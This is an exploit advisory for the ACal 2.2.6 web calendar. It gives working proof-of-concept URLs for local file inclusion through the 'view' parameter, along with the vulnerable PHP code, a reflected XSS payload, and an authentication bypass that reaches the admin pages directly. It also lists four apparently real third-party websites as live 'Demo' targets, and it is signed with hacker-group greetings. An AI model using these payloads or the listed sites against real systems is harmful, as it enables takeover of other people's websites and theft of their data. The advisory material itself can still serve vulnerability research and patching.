ACal version 2.2.6 suffers from authentication bypass, cross site scripting, and local file inclusion vulnerabilities.
511a1d027ab58b124b1f26063b3c337a2208eff63967679b47f5076351eb9b0c
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities
[+] Category: WebApp
[+] Google Dork: Use your mind
[+] Tested on: KaliLinux
[+] Vendor: http://acalproj.sourceforge.net/
########################################################################################
+Description:
A web based event calendar that does not require a database server.
It is made to be easy to install and to be able to run on just about any typical ISP's server with PHP installed.
+Exploit:
Acal Suffers from an LFI,XSS and Auth Bypass vulnerabilities:
1/LFI:
File(s): example.php : Lines 24--30
Parameter:view
[PHP]
// DO NOT EDIT
if (!isset($_GET['view'])) {
include $path . 'embed/' . $view . '.php';
}
else {
include $path . 'embed/' . $_GET['view'] . '.php';
}
[PHP]
P.O.C:
127.0.0.1/calendar/embed/example/example.php?view=[LFI]
2/ XSS:
127.0.0.1/calendar/calendar.php?year=<script>alert(111)</script>
http://s13.postimg.org/u9bvlrg1i/www.jpg
3/Auth Bypass:
You can access directly to the admin panel and you can change login details:
127.0.0.1/calendar/admin/changelogin.php
Demo:
http://www.benifeade.com/i/calendar/admin/changelogin.php
http://www.diprove.unimi.it/calendar/admin/edit.php
http://tavernadeglieroi.altervista.org/calendar/admin/edit.php
http://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################